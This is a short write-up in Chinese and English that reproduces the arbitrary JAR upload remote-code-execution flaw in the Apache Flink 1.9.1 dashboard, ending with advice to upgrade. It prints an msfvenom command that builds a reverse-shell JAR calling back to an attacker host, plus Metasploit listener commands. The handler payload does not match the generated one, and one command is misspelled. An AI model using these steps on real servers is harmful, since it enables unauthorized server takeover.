Apache Flink 任意 Jar 包上传导致 RCE 漏洞

Apache Flink is a distributed big data processing engine that performs stateful calculations on finite and infinite data streams. It can be deployed in various cluster environments to perform rapid calculations of data sizes of various sizes.

ApacheFlink is an open source stream processing framework developed by the Apache Software Foundation, with its core being a distributed streaming data streaming engine written in Java and Scala. Flink executes arbitrary streaming data programs in data parallelism and pipeline modes. Flink's pipeline runtime system can execute batch and streaming programs. In addition, the Flink runtime itself also supports the execution of iterative algorithms.

An attacker can use this vulnerability to upload any Jar package in the Apache Flink Dashboard page, and use Metasploit to execute arbitrary code in the Apache Flink server to obtain the highest permissions of the server, so it is more harmful.

影响范围

Apache Flink=1.9.1

环境搭建

Download Apache Flink 1.9.1 package:

1

wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

Unzip the installation package:

1

tar –zxvf flink-1.9.1-bin-scala_2.11.tgz

Enter the bin directory and start Flink:

1

./start-cluster.sh

Browser access: http://IP:8081

漏洞复现

msf generates a reverse shell horse

1

msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f jar shell.jar

msf set listening

1

2

3

use exploit/multi/handler

set payload java/shell/reverse_tcp

expolit

Upload shell.jar and submit

The rebound shell

修复建议

Upgrade Apache Flink to the latest version